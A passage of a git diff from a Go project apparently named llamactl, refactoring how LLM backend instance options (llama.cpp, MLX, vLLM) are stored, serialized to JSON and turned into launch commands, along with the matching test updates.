 		t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay)
 	}
-}
 
-func TestNewInstance_WithRestartOptions(t *testing.T) {
-	backendConfig := &config.BackendConfig{
-		LlamaCpp: config.BackendSettings{
-			Command: "llama-server",
-			Args:    []string{},
-		},
-		MLX: config.BackendSettings{
-			Command: "mlx_lm.server",
-			Args:    []string{},
-		},
-		VLLM: config.BackendSettings{
-			Command: "vllm",
-			Args:    []string{"serve"},
-		},
-	}
-
-	globalSettings := &config.InstancesConfig{
-		LogsDir:             "/tmp/test",
-
DefaultAutoRestart: true, - DefaultMaxRestarts: 3, - DefaultRestartDelay: 5, - } - - // Override some defaults + // Test that explicit values override defaults autoRestart := false maxRestarts := 10 - restartDelay := 15 - - options := &instance.Options{ + optionsWithOverrides := &instance.Options{ AutoRestart: &autoRestart, MaxRestarts: &maxRestarts, - RestartDelay: &restartDelay, - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } - // Mock onStatusChange function - mockOnStatusChange := func(oldStatus, newStatus instance.Status) {} + inst2 := instance.New("test-override", backendConfig, globalSettings, optionsWithOverrides, "main", mockOnStatusChange) + opts2 := inst2.GetOptions() - instance := instance.New("test-instance", backendConfig, globalSettings, options, "main", mockOnStatusChange) - opts := instance.GetOptions() - - // Check that explicit values override defaults - if opts.AutoRestart == nil || *opts.AutoRestart { + if opts2.AutoRestart == nil || *opts2.AutoRestart { t.Error("Expected AutoRestart to be false (overridden)") } - if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 { - t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts) - } - if opts.RestartDelay == nil || *opts.RestartDelay != 15 { - t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay) + if opts2.MaxRestarts == nil || *opts2.MaxRestarts != 10 { + t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts2.MaxRestarts) } } @@ -155,10 +124,12 @@ func TestSetOptions(t *testing.T) { } initialOptions := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", - Port: 8080, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: 8080, + }, }, } @@ -169,18 +140,20 @@ func TestSetOptions(t *testing.T) { // Update options newOptions := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/new-model.gguf", - Port: 8081, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/new-model.gguf", + Port: 8081, + }, }, } inst.SetOptions(newOptions) opts := inst.GetOptions() - if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" { - t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model) + if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" { + t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model) } if inst.GetPort() != 8081 { t.Errorf("Expected updated port 8081, got %d", inst.GetPort()) @@ -192,58 +165,6 @@ func TestSetOptions(t *testing.T) { } } -func TestSetOptions_PreservesNodes(t *testing.T) { - backendConfig := &config.BackendConfig{ - LlamaCpp: config.BackendSettings{ - Command: "llama-server", - Args: []string{}, - }, - } - - globalSettings := &config.InstancesConfig{ - LogsDir: "/tmp/test", - DefaultAutoRestart: true, - DefaultMaxRestarts: 3, - DefaultRestartDelay: 5, - } - - // Create 
instance with initial nodes - initialOptions := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - Nodes: map[string]struct{}{"worker1": {}}, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", - Port: 8080, - }, - } - - mockOnStatusChange := func(oldStatus, newStatus instance.Status) {} - inst := instance.New("test-instance", backendConfig, globalSettings, initialOptions, "main", mockOnStatusChange) - - // Try to update with different nodes - updatedOptions := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - Nodes: map[string]struct{}{"worker2": {}}, // Attempt to change node - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/new-model.gguf", - Port: 8081, - }, - } - - inst.SetOptions(updatedOptions) - opts := inst.GetOptions() - - // Nodes should remain unchanged - if _, exists := opts.Nodes["worker1"]; len(opts.Nodes) != 1 || !exists { - t.Errorf("Expected nodes to contain 'worker1', got %v", opts.Nodes) - } - - // Other options should be updated - if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" { - t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model) - } -} - func TestGetProxy(t *testing.T) { backendConfig := &config.BackendConfig{ LlamaCpp: config.BackendSettings{ @@ -265,10 +186,13 @@ func TestGetProxy(t *testing.T) { } options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Host: "localhost", - Port: 8080, + Nodes: map[string]struct{}{"main": {}}, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Host: "localhost", + Port: 8080, + }, }, } @@ -298,49 +222,29 @@ func TestGetProxy(t *testing.T) { func TestMarshalJSON(t *testing.T) { backendConfig := &config.BackendConfig{ - LlamaCpp: config.BackendSettings{ - Command: "llama-server", - Args: []string{}, - }, - MLX: config.BackendSettings{ - Command: "mlx_lm.server", - Args: []string{}, - }, - VLLM: config.BackendSettings{ - Command: "vllm", - Args: []string{"serve"}, - }, + LlamaCpp: config.BackendSettings{Command: "llama-server"}, } - - globalSettings := &config.InstancesConfig{ - LogsDir: "/tmp/test", - DefaultAutoRestart: true, - DefaultMaxRestarts: 3, - DefaultRestartDelay: 5, - } - + globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"} options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", - Port: 8080, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: 8080, + }, }, } - // Mock onStatusChange function - mockOnStatusChange := func(oldStatus, newStatus instance.Status) {} + inst := instance.New("test-instance", backendConfig, globalSettings, options, "main", nil) - instance := instance.New("test-instance", backendConfig, globalSettings, options, "main", mockOnStatusChange) - - data, err := json.Marshal(instance) + data, err := json.Marshal(inst) if err != nil { t.Fatalf("JSON marshal failed: %v", err) } - // Check that JSON contains expected fields + // Verify by unmarshaling and checking key fields var result map[string]any - err = json.Unmarshal(data, &result) - if err != nil { + if err := json.Unmarshal(data, &result); err != nil { t.Fatalf("JSON unmarshal failed: %v", err) } @@ -350,37 +254,9 @@ 
func TestMarshalJSON(t *testing.T) { if result["status"] != "stopped" { t.Errorf("Expected status 'stopped', got %v", result["status"]) } - - // Check that options are included - options_data, ok := result["options"] - if !ok { + if result["options"] == nil { t.Error("Expected options to be included in JSON") } - options_map, ok := options_data.(map[string]interface{}) - if !ok { - t.Error("Expected options to be a map") - } - - // Check backend type - if options_map["backend_type"] != string(backends.BackendTypeLlamaCpp) { - t.Errorf("Expected backend_type '%s', got %v", backends.BackendTypeLlamaCpp, options_map["backend_type"]) - } - - // Check backend options - backend_options_data, ok := options_map["backend_options"] - if !ok { - t.Error("Expected backend_options to be included in JSON") - } - backend_options_map, ok := backend_options_data.(map[string]any) - if !ok { - t.Error("Expected backend_options to be a map") - } - if backend_options_map["model"] != "/path/to/model.gguf" { - t.Errorf("Expected model '/path/to/model.gguf', got %v", backend_options_map["model"]) - } - if backend_options_map["port"] != float64(8080) { - t.Errorf("Expected port 8080, got %v", backend_options_map["port"]) - } } func TestUnmarshalJSON(t *testing.T) { @@ -415,14 +291,14 @@ func TestUnmarshalJSON(t *testing.T) { if opts == nil { t.Fatal("Expected options to be set") } - if opts.BackendType != backends.BackendTypeLlamaCpp { - t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendType) + if opts.BackendOptions.BackendType != backends.BackendTypeLlamaCpp { + t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendOptions.BackendType) } - if opts.LlamaServerOptions == nil { + if opts.BackendOptions.LlamaServerOptions == nil { t.Fatal("Expected LlamaServerOptions to be set") } - if opts.LlamaServerOptions.Model != "/path/to/model.gguf" { - t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model) + if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/model.gguf" { + t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model) } if inst.GetPort() != 8080 { t.Errorf("Expected port 8080, got %d", inst.GetPort()) @@ -490,9 +366,11 @@ func TestCreateOptionsValidation(t *testing.T) { options := &instance.Options{ MaxRestarts: tt.maxRestarts, RestartDelay: tt.restartDelay, - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } @@ -523,9 +401,11 @@ func TestStatusChangeCallback(t *testing.T) { } globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"} options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } @@ -588,10 +468,12 @@ func TestSetOptions_NodesPreserved(t *testing.T) { for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - Nodes: tt.initialNodes, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + Nodes: 
tt.initialNodes, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } @@ -599,10 +481,12 @@ func TestSetOptions_NodesPreserved(t *testing.T) { // Attempt to update nodes (should be ignored) updateOptions := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - Nodes: tt.updateNodes, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/new-model.gguf", + Nodes: tt.updateNodes, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/new-model.gguf", + }, }, } inst.SetOptions(updateOptions) @@ -620,8 +504,8 @@ func TestSetOptions_NodesPreserved(t *testing.T) { } // Verify other options were updated - if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" { - t.Errorf("Expected model to be updated to '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model) + if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" { + t.Errorf("Expected model to be updated to '/path/to/new-model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model) } }) } @@ -633,9 +517,11 @@ func TestProcessErrorCases(t *testing.T) { } globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"} options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } @@ -663,10 +549,12 @@ func TestRemoteInstanceOperations(t *testing.T) { } globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"} options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - Nodes: map[string]struct{}{"remote-node": {}}, // Remote instance - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + Nodes: map[string]struct{}{"remote-node": {}}, // Remote instance + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } @@ -702,49 +590,6 @@ func TestRemoteInstanceOperations(t *testing.T) { } } -func TestProxyClearOnOptionsChange(t *testing.T) { - backendConfig := &config.BackendConfig{ - LlamaCpp: config.BackendSettings{Command: "llama-server"}, - } - globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"} - options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Host: "localhost", - Port: 8080, - }, - } - - inst := instance.New("test", backendConfig, globalSettings, options, "main", nil) - - // Get initial proxy - proxy1, err := inst.GetProxy() - if err != nil { - t.Fatalf("Failed to get initial proxy: %v", err) - } - - // Update options (should clear proxy) - newOptions := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Host: "localhost", - Port: 8081, // Different port - }, - } - inst.SetOptions(newOptions) - - // Get proxy again - should be recreated with new port - proxy2, err := inst.GetProxy() - if err != nil { - t.Fatalf("Failed to get proxy after options change: %v", err) - } - - // Proxies should be different instances (recreated) - if proxy1 == proxy2 { - t.Error("Expected 
proxy to be recreated after options change") - } -} - func TestIdleTimeout(t *testing.T) { backendConfig := &config.BackendConfig{ LlamaCpp: config.BackendSettings{Command: "llama-server"}, @@ -754,10 +599,12 @@ func TestIdleTimeout(t *testing.T) { t.Run("not running never times out", func(t *testing.T) { timeout := 1 inst := instance.New("test", backendConfig, globalSettings, &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, IdleTimeout: &timeout, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, }, "main", nil) @@ -768,10 +615,12 @@ func TestIdleTimeout(t *testing.T) { t.Run("no timeout configured", func(t *testing.T) { inst := instance.New("test", backendConfig, globalSettings, &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, IdleTimeout: nil, // No timeout - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, }, "main", nil) inst.SetStatus(instance.Running) @@ -784,10 +633,12 @@ func TestIdleTimeout(t *testing.T) { t.Run("timeout exceeded", func(t *testing.T) { timeout := 1 // 1 minute inst := instance.New("test", backendConfig, globalSettings, &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, IdleTimeout: &timeout, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, }, "main", nil) inst.SetStatus(instance.Running) diff --git a/pkg/instance/options.go b/pkg/instance/options.go index 1dddb15..0c4b582 100644 --- a/pkg/instance/options.go +++ b/pkg/instance/options.go @@ -4,12 +4,8 @@ import ( "encoding/json" "fmt" "llamactl/pkg/backends" - "llamactl/pkg/backends/llamacpp" - "llamactl/pkg/backends/mlx" - "llamactl/pkg/backends/vllm" "llamactl/pkg/config" "log" - "maps" "slices" "sync" ) @@ -24,18 +20,12 @@ type Options struct { OnDemandStart *bool `json:"on_demand_start,omitempty"` // Idle timeout IdleTimeout *int `json:"idle_timeout,omitempty"` // minutes - //Environment variables + // Environment variables Environment map[string]string `json:"environment,omitempty"` - - BackendType backends.BackendType `json:"backend_type"` - BackendOptions map[string]any `json:"backend_options,omitempty"` - + // Assigned nodes Nodes map[string]struct{} `json:"-"` - - // Backend-specific options - LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"` - MlxServerOptions *mlx.MlxServerOptions `json:"-"` - VllmServerOptions *vllm.VllmServerOptions `json:"-"` + // Backend options + BackendOptions backends.Options `json:"-"` } // options wraps Options with thread-safe access (unexported). 
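
For context on the new shape: backend_type and backend_options no longer carry struct tags on instance.Options; the custom marshalers below rebuild them, so the wire format stays flat while the typed backend structs live under BackendOptions. A minimal round-trip sketch of that behavior, assuming the import path used throughout this diff (payload values are hypothetical):

package main

import (
	"encoding/json"
	"fmt"

	"llamactl/pkg/instance"
)

func main() {
	// Flat wire format: backend_type discriminates the backend,
	// backend_options carries its settings as a raw map.
	payload := []byte(`{
		"backend_type": "llama_cpp",
		"backend_options": {"model": "/path/to/model.gguf", "port": 8080}
	}`)

	var opts instance.Options
	if err := json.Unmarshal(payload, &opts); err != nil {
		panic(err)
	}

	// The custom UnmarshalJSON routes the raw map into the typed struct.
	fmt.Println(opts.BackendOptions.LlamaServerOptions.Model) // /path/to/model.gguf

	// Marshaling a pointer flattens the typed struct back into backend_options.
	out, err := json.Marshal(&opts)
	if err != nil {
		panic(err)
	}
	fmt.Println(string(out))
}
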
@@ -65,6 +55,18 @@ func (o *options) set(opts *Options) { o.opts = opts } +func (o *options) GetHost() string { + o.mu.RLock() + defer o.mu.RUnlock() + return o.opts.BackendOptions.GetHost() +} + +func (o *options) GetPort() int { + o.mu.RLock() + defer o.mu.RUnlock() + return o.opts.BackendOptions.GetPort() +} + // MarshalJSON implements json.Marshaler for options wrapper func (o *options) MarshalJSON() ([]byte, error) { o.mu.RLock() @@ -88,7 +90,9 @@ func (c *Options) UnmarshalJSON(data []byte) error { // Use anonymous struct to avoid recursion type Alias Options aux := &struct { - Nodes []string `json:"nodes,omitempty"` // Accept JSON array + Nodes []string `json:"nodes,omitempty"` + BackendType backends.BackendType `json:"backend_type"` + BackendOptions map[string]any `json:"backend_options,omitempty"` *Alias }{ Alias: (*Alias)(c), @@ -106,47 +110,27 @@ func (c *Options) UnmarshalJSON(data []byte) error { } } - // Parse backend-specific options - switch c.BackendType { - case backends.BackendTypeLlamaCpp: - if c.BackendOptions != nil { - // Convert map to JSON and then unmarshal to LlamaServerOptions - optionsData, err := json.Marshal(c.BackendOptions) - if err != nil { - return fmt.Errorf("failed to marshal backend options: %w", err) - } + // Create backend options struct and unmarshal + c.BackendOptions = backends.Options{ + BackendType: aux.BackendType, + BackendOptions: aux.BackendOptions, + } - c.LlamaServerOptions = &llamacpp.LlamaServerOptions{} - if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil { - return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err) - } - } - case backends.BackendTypeMlxLm: - if c.BackendOptions != nil { - optionsData, err := json.Marshal(c.BackendOptions) - if err != nil { - return fmt.Errorf("failed to marshal backend options: %w", err) - } + // Marshal the backend options to JSON for proper unmarshaling + backendJson, err := json.Marshal(struct { + BackendType backends.BackendType `json:"backend_type"` + BackendOptions map[string]any `json:"backend_options,omitempty"` + }{ + BackendType: aux.BackendType, + BackendOptions: aux.BackendOptions, + }) + if err != nil { + return fmt.Errorf("failed to marshal backend options: %w", err) + } - c.MlxServerOptions = &mlx.MlxServerOptions{} - if err := json.Unmarshal(optionsData, c.MlxServerOptions); err != nil { - return fmt.Errorf("failed to unmarshal MLX options: %w", err) - } - } - case backends.BackendTypeVllm: - if c.BackendOptions != nil { - optionsData, err := json.Marshal(c.BackendOptions) - if err != nil { - return fmt.Errorf("failed to marshal backend options: %w", err) - } - - c.VllmServerOptions = &vllm.VllmServerOptions{} - if err := json.Unmarshal(optionsData, c.VllmServerOptions); err != nil { - return fmt.Errorf("failed to unmarshal vLLM options: %w", err) - } - } - default: - return fmt.Errorf("unknown backend type: %s", c.BackendType) + // Unmarshal into the backends.Options struct to trigger its custom unmarshaling + if err := json.Unmarshal(backendJson, &c.BackendOptions); err != nil { + return fmt.Errorf("failed to unmarshal backend options: %w", err) } return nil @@ -157,7 +141,9 @@ func (c *Options) MarshalJSON() ([]byte, error) { // Use anonymous struct to avoid recursion type Alias Options aux := struct { - Nodes []string `json:"nodes,omitempty"` // Output as JSON array + Nodes []string `json:"nodes,omitempty"` // Output as JSON array + BackendType backends.BackendType `json:"backend_type"` + BackendOptions map[string]any `json:"backend_options,omitempty"` 
*Alias }{ Alias: (*Alias)(c), @@ -173,52 +159,26 @@ func (c *Options) MarshalJSON() ([]byte, error) { slices.Sort(aux.Nodes) } - // Convert backend-specific options back to BackendOptions map for JSON - switch c.BackendType { - case backends.BackendTypeLlamaCpp: - if c.LlamaServerOptions != nil { - data, err := json.Marshal(c.LlamaServerOptions) - if err != nil { - return nil, fmt.Errorf("failed to marshal llama server options: %w", err) - } + // Set backend type + aux.BackendType = c.BackendOptions.BackendType - var backendOpts map[string]any - if err := json.Unmarshal(data, &backendOpts); err != nil { - return nil, fmt.Errorf("failed to unmarshal to map: %w", err) - } - - aux.BackendOptions = backendOpts - } - case backends.BackendTypeMlxLm: - if c.MlxServerOptions != nil { - data, err := json.Marshal(c.MlxServerOptions) - if err != nil { - return nil, fmt.Errorf("failed to marshal MLX server options: %w", err) - } - - var backendOpts map[string]any - if err := json.Unmarshal(data, &backendOpts); err != nil { - return nil, fmt.Errorf("failed to unmarshal to map: %w", err) - } - - aux.BackendOptions = backendOpts - } - case backends.BackendTypeVllm: - if c.VllmServerOptions != nil { - data, err := json.Marshal(c.VllmServerOptions) - if err != nil { - return nil, fmt.Errorf("failed to marshal vLLM server options: %w", err) - } - - var backendOpts map[string]any - if err := json.Unmarshal(data, &backendOpts); err != nil { - return nil, fmt.Errorf("failed to unmarshal to map: %w", err) - } - - aux.BackendOptions = backendOpts - } + // Marshal the backends.Options struct to get the properly formatted backend options + // Marshal a pointer to trigger the pointer receiver MarshalJSON method + backendData, err := json.Marshal(&c.BackendOptions) + if err != nil { + return nil, fmt.Errorf("failed to marshal backend options: %w", err) } + // Unmarshal into a temporary struct to extract the backend_options map + var tempBackend struct { + BackendOptions map[string]any `json:"backend_options,omitempty"` + } + if err := json.Unmarshal(backendData, &tempBackend); err != nil { + return nil, fmt.Errorf("failed to unmarshal backend data: %w", err) + } + + aux.BackendOptions = tempBackend.BackendOptions + return json.Marshal(aux) } @@ -260,78 +220,3 @@ func (c *Options) validateAndApplyDefaults(name string, globalSettings *config.I } } } - -// getCommand builds the command to run the backend -func (c *Options) getCommand(backendConfig *config.BackendSettings) string { - - if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm { - return "docker" - } - - return backendConfig.Command -} - -// buildCommandArgs builds command line arguments for the backend -func (c *Options) buildCommandArgs(backendConfig *config.BackendSettings) []string { - - var args []string - - if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm { - // For Docker, start with Docker args - args = append(args, backendConfig.Docker.Args...) - args = append(args, backendConfig.Docker.Image) - - switch c.BackendType { - case backends.BackendTypeLlamaCpp: - if c.LlamaServerOptions != nil { - args = append(args, c.LlamaServerOptions.BuildDockerArgs()...) - } - case backends.BackendTypeVllm: - if c.VllmServerOptions != nil { - args = append(args, c.VllmServerOptions.BuildDockerArgs()...) - } - } - - } else { - // For native execution, start with backend args - args = append(args, backendConfig.Args...) 
- - switch c.BackendType { - case backends.BackendTypeLlamaCpp: - if c.LlamaServerOptions != nil { - args = append(args, c.LlamaServerOptions.BuildCommandArgs()...) - } - case backends.BackendTypeMlxLm: - if c.MlxServerOptions != nil { - args = append(args, c.MlxServerOptions.BuildCommandArgs()...) - } - case backends.BackendTypeVllm: - if c.VllmServerOptions != nil { - args = append(args, c.VllmServerOptions.BuildCommandArgs()...) - } - } - } - - return args -} - -// buildEnvironment builds the environment variables for the backend process -func (c *Options) buildEnvironment(backendConfig *config.BackendSettings) map[string]string { - env := map[string]string{} - - if backendConfig.Environment != nil { - maps.Copy(env, backendConfig.Environment) - } - - if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm { - if backendConfig.Docker.Environment != nil { - maps.Copy(env, backendConfig.Docker.Environment) - } - } - - if c.Environment != nil { - maps.Copy(env, c.Environment) - } - - return env -} diff --git a/pkg/instance/process.go b/pkg/instance/process.go index 9c7cfec..3429e61 100644 --- a/pkg/instance/process.go +++ b/pkg/instance/process.go @@ -12,9 +12,6 @@ import ( "sync" "syscall" "time" - - "llamactl/pkg/backends" - "llamactl/pkg/config" ) // process manages the OS process lifecycle for a local instance. @@ -216,7 +213,8 @@ func (p *process) waitForHealthy(timeout int) error { defer cancel() // Get host/port from instance - host, port := p.instance.getBackendHostPort() + host := p.instance.options.GetHost() + port := p.instance.options.GetPort() healthURL := fmt.Sprintf("http://%s:%d/health", host, port) // Create a dedicated HTTP client for health checks @@ -386,26 +384,15 @@ func (p *process) handleAutoRestart(err error) { // buildCommand builds the command to execute using backend-specific logic func (p *process) buildCommand() (*exec.Cmd, error) { - // Get options - opts := p.instance.GetOptions() - if opts == nil { - return nil, fmt.Errorf("instance options are nil") - } - - // Get backend configuration - backendConfig, err := p.getBackendConfig() - if err != nil { - return nil, err - } // Build the environment variables - env := opts.buildEnvironment(backendConfig) + env := p.instance.buildEnvironment() // Get the command to execute - command := opts.getCommand(backendConfig) + command := p.instance.getCommand() // Build command arguments - args := opts.buildCommandArgs(backendConfig) + args := p.instance.buildCommandArgs() // Create the exec.Cmd cmd := exec.CommandContext(p.ctx, command, args...) 
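
With the backend-specific branching gone, buildCommand is only glue: it asks the instance for the resolved command, args, and environment, then assembles the exec.Cmd. A standalone sketch of that assembly step (the helper name and the values are illustrative, not from the repo):

package main

import (
	"context"
	"fmt"
	"os"
	"os/exec"
)

// buildCmd mirrors the shape of buildCommand above: a pre-resolved command,
// args, and environment map are combined into a single exec.Cmd.
func buildCmd(ctx context.Context, command string, args []string, env map[string]string) *exec.Cmd {
	cmd := exec.CommandContext(ctx, command, args...)
	cmd.Env = os.Environ() // inherit the parent environment
	for k, v := range env {
		cmd.Env = append(cmd.Env, fmt.Sprintf("%s=%s", k, v))
	}
	return cmd
}

func main() {
	// Hypothetical values resembling a native llama.cpp launch.
	cmd := buildCmd(context.Background(),
		"llama-server",
		[]string{"--model", "/path/to/model.gguf", "--port", "8080"},
		map[string]string{"CUDA_VISIBLE_DEVICES": "0"},
	)
	fmt.Println(cmd.String())
}
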
@@ -420,27 +407,3 @@ func (p *process) buildCommand() (*exec.Cmd, error) { return cmd, nil } - -// getBackendConfig resolves the backend configuration for the current instance -func (p *process) getBackendConfig() (*config.BackendSettings, error) { - opts := p.instance.GetOptions() - if opts == nil { - return nil, fmt.Errorf("instance options are nil") - } - - var backendTypeStr string - - switch opts.BackendType { - case backends.BackendTypeLlamaCpp: - backendTypeStr = "llama-cpp" - case backends.BackendTypeMlxLm: - backendTypeStr = "mlx" - case backends.BackendTypeVllm: - backendTypeStr = "vllm" - default: - return nil, fmt.Errorf("unsupported backend type: %s", opts.BackendType) - } - - settings := p.instance.globalBackendSettings.GetBackendSettings(backendTypeStr) - return &settings, nil -} diff --git a/pkg/instance/proxy.go b/pkg/instance/proxy.go index 321095b..a429889 100644 --- a/pkg/instance/proxy.go +++ b/pkg/instance/proxy.go @@ -2,7 +2,6 @@ package instance import ( "fmt" - "llamactl/pkg/backends" "net/http" "net/http/httputil" "net/url" @@ -63,13 +62,16 @@ func (p *proxy) build() (*httputil.ReverseProxy, error) { } // Remote instances should not use local proxy - they are handled by RemoteInstanceProxy - if len(options.Nodes) > 0 { + if _, isLocal := options.Nodes[p.instance.localNodeName]; !isLocal { return nil, fmt.Errorf("instance %s is a remote instance and should not use local proxy", p.instance.Name) } // Get host/port from process - host, port := p.instance.getBackendHostPort() - + host := p.instance.options.GetHost() + port := p.instance.options.GetPort() + if port == 0 { + return nil, fmt.Errorf("instance %s has no port assigned", p.instance.Name) + } targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", host, port)) if err != nil { return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", p.instance.Name, err) @@ -78,15 +80,7 @@ func (p *proxy) build() (*httputil.ReverseProxy, error) { proxy := httputil.NewSingleHostReverseProxy(targetURL) // Get response headers from backend config - var responseHeaders map[string]string - switch options.BackendType { - case backends.BackendTypeLlamaCpp: - responseHeaders = p.instance.globalBackendSettings.LlamaCpp.ResponseHeaders - case backends.BackendTypeVllm: - responseHeaders = p.instance.globalBackendSettings.VLLM.ResponseHeaders - case backends.BackendTypeMlxLm: - responseHeaders = p.instance.globalBackendSettings.MLX.ResponseHeaders - } + responseHeaders := options.BackendOptions.GetResponseHeaders(p.instance.globalBackendSettings) proxy.ModifyResponse = func(resp *http.Response) error { // Remove CORS headers from backend response to avoid conflicts diff --git a/pkg/manager/manager_test.go b/pkg/manager/manager_test.go index 531e9e2..8c1be1c 100644 --- a/pkg/manager/manager_test.go +++ b/pkg/manager/manager_test.go @@ -3,7 +3,6 @@ package manager_test import ( "fmt" "llamactl/pkg/backends" - "llamactl/pkg/backends/llamacpp" "llamactl/pkg/config" "llamactl/pkg/instance" "llamactl/pkg/manager" @@ -71,10 +70,12 @@ func TestPersistence(t *testing.T) { // Test instance persistence on creation manager1 := 